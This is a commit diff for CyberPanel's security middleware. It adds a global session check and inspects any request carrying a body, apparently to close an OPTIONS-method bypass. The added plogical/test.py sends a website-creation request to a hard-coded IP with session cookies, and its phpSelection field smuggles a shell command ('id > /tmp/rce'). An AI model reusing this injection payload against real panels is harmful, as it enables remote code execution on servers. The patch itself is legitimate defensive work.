added global session detector for further security

CyberCP/secMiddleware.py

@@ -22,6 +22,45 @@ class secMiddleware:
         self.get_response = get_response
 
     def __call__(self, request):
+
+        ######
+
+        from plogical.processUtilities import ProcessUtilities
+        FinalURL = request.build_absolute_uri().split('?')[0]
+
+        from urllib.parse import urlparse
+        pathActual = urlparse(FinalURL).path
+
+        if os.path.exists(ProcessUtilities.debugPath):
+            logging.writeToFile(f'Path vs the final url : {pathActual}')
+            logging.writeToFile(FinalURL)
+
+        if pathActual == '/' or pathActual == '/verifyLogin' or pathActual == '/logout' or pathActual.startswith('/api')\
+                or pathActual.endswith('/webhook') or pathActual.startswith('/cloudAPI') or pathActual.endswith('/gitNotify'):
+            pass
+        else:
+            try:
+                val = request.session['userID']
+            except:
+                if bool(request.body):
+                    final_dic = {
+                        'error_message': "This request need session.",
+                        "errorMessage": "This request need session."}
+                    final_json = json.dumps(final_dic)
+                    return HttpResponse(final_json)
+                else:
+                    from django.shortcuts import redirect
+                    from loginSystem.views import loadLoginPage
+                    return redirect(loadLoginPage)
+
+        # if os.path.exists(ProcessUtilities.debugPath):
+        #     logging.writeToFile(f'Final actual URL without QS {FinalURL}')
+
+        if os.path.exists(ProcessUtilities.debugPath):
+            logging.writeToFile(f'Request method {request.method.lower()}')
+
+        ##########################
+
         try:
             uID = request.session['userID']
             admin = Administrator.objects.get(pk=uID)
@@ -53,26 +92,7 @@ class secMiddleware:
         except:
             pass
 
-        from plogical.processUtilities import ProcessUtilities
+        if bool(request.body):
-        FinalURL = request.build_absolute_uri().split('?')[0]
-
-        if os.path.exists(ProcessUtilities.debugPath):
-            logging.writeToFile(request.build_absolute_uri())
-            logging.writeToFile(FinalURL)
-
-
-        if FinalURL == '/' or FinalURL == '/verifyLogin' or FinalURL == '/logout':
-            if os.path.exists(ProcessUtilities.debugPath):
-                logging.writeToFile(request.build_absolute_uri())
-
-
-        # if os.path.exists(ProcessUtilities.debugPath):
-        #     logging.writeToFile(f'Final actual URL without QS {FinalURL}')
-
-        if os.path.exists(ProcessUtilities.debugPath):
-            logging.writeToFile(f'Request method {request.method.lower()}')
-
-        if request.method.lower() == 'post' or request.method.lower() == 'options':
             try:
 
                 # logging.writeToFile(request.body)
@@ -154,6 +174,9 @@ class secMiddleware:
                 logging.writeToFile(str(msg))
                 response = self.get_response(request)
                 return response
+        else:
+            if os.path.exists(ProcessUtilities.debugPath):
+                logging.writeToFile('Request does not have a body.')
         # else:
         #     try:
         #         if request.path.find('cloudAPI/') > -1 or request.path.find('api/') > -1:

api/views.py

@@ -92,7 +92,6 @@ def getPackagesListAPI(request):
         json_data = json.dumps(data_ret)
         return HttpResponse(json_data)
 
-
 @csrf_exempt
 def getUserInfo(request):
     try:

plogical/test.py

@@ -0,0 +1,39 @@
+import requests
+
+url = "https://95.217.125.210:8090/websites/submitWebsiteCreation"
+headers = {
+    "Host": "95.217.125.210:8090",
+    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8",
+    "Accept-Language": "en-US,en;q=0.5",
+    "Accept-Encoding": "gzip, deflate, br, zstd",
+    "Referer": "https://95.217.125.210:8090/",
+    "Connection": "keep-alive",
+    "Cookie": "csrftoken=yWFDXndgjcsNYj7z8IYozbCQUBj4eLjXsG14u1PQay1lrwohlnqLHG5fwTuRC8I0; smtoken=7c09dd03817bdfebcaf0a97be32628c480663479; django_language=en; SignonSession=422tgvnrnd2f97lem1e2q0l76l; AIOHTTP_SESSION=\"gAAAAABnG8rXm2L1JmWTEqI8BGKHlWUvCQLuvN_VXWu-6r25Rk811sSjtcEK1-kuE-TrQTOwmN2K2xianVlqB3d70QcTeuQwH6a8yRfpi1UMDlysd8W10Xk8h4I_H77EFhZ01d05GImBipmznQIrQ54ZUBWt7ygx8JW52DYaG94Rd9slB3CZqpc=\"; sessionid=tsiqhd7qkcqh393qkdy7oteiagb046sl",
+    "Upgrade-Insecure-Requests": "1",
+    "Sec-Fetch-Dest": "document",
+    "Sec-Fetch-Mode": "navigate",
+    "Sec-Fetch-Site": "same-origin",
+    "Sec-Fetch-User": "?1",
+    "Priority": "u=0, i",
+    "Pragma": "no-cache",
+    "Cache-Control": "no-cache"
+}
+
+data = {
+    "package": "Default",
+    "domainName": "cyberpanel.net",
+    "ownerEmail": "cyber@gmail.com",
+    "phpSelection": "PHP 7.4; id > /tmp/rce; #",
+    "ssl": "on",
+    "websiteOwner": "admin",
+    "dkimCheck": "0",
+    "openBasedir": "on",
+    "mailDomain": "0",
+    "apacheBackend": "0"
+}
+
+response = requests.options(url, headers=headers, json=data, verify=False)
+
+print(response.status_code)
+print(response.text)